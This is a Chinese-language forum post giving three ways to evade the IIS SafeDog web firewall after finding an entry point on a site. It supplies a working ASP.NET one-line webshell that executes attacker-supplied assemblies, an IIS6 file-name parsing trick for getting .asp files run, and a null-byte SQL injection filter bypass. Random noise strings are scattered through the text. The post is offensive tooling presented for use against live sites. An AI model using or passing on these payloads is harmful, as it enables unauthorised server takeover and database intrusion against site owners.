1、绕过IIS安全狗的一句话。
/ f: I. d7 a0 |9 Q4 G! Y4 v前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。0 ]; l+ N: r0 s% T2 P
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。, P8 p6 E3 F& N; m( X
. X/ K- z) a; ?5 ~; ?8 Q( C5 q
2、IIS6.0解析漏洞遇到安全狗。: \4 k" P' }# ?$ i- U9 ~
文件名为
. e! j: W$ m( r0 xhttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
}7 ]" e7 V4 F, x, A+ a7 ~1 y3 v6 N) X! Z1 |8 ]9 J% d
这样的会被IIS安全狗果断屏蔽。. I* }3 R# e" I% e
改成如下名称,IIS6一样会解析:
: S* ~5 Y& c2 F( R! Vwww.xxxxx.com/;1.asp;1.jpg8 h' a6 d' Q" x) n& d5 S) H
# D Q! A+ e& @9 r
3、安全狗的注入绕过。+ [8 F8 a4 P/ D; |$ Q
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。' s$ l+ |0 y* w1 m' B1 t8 K+ F
但如果:) k; k! q0 C: h S$ \# |% g
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=12 q ?6 B9 n) d# Y1 f* d
就可以成功绕过了。7 ]$ S, S- e3 }; ?7 x3 _! y! U2 O0 Y
2 L$ _% l7 j4 ]3 @0 d
/ ^* n% G) A# N6 }* o9 d
|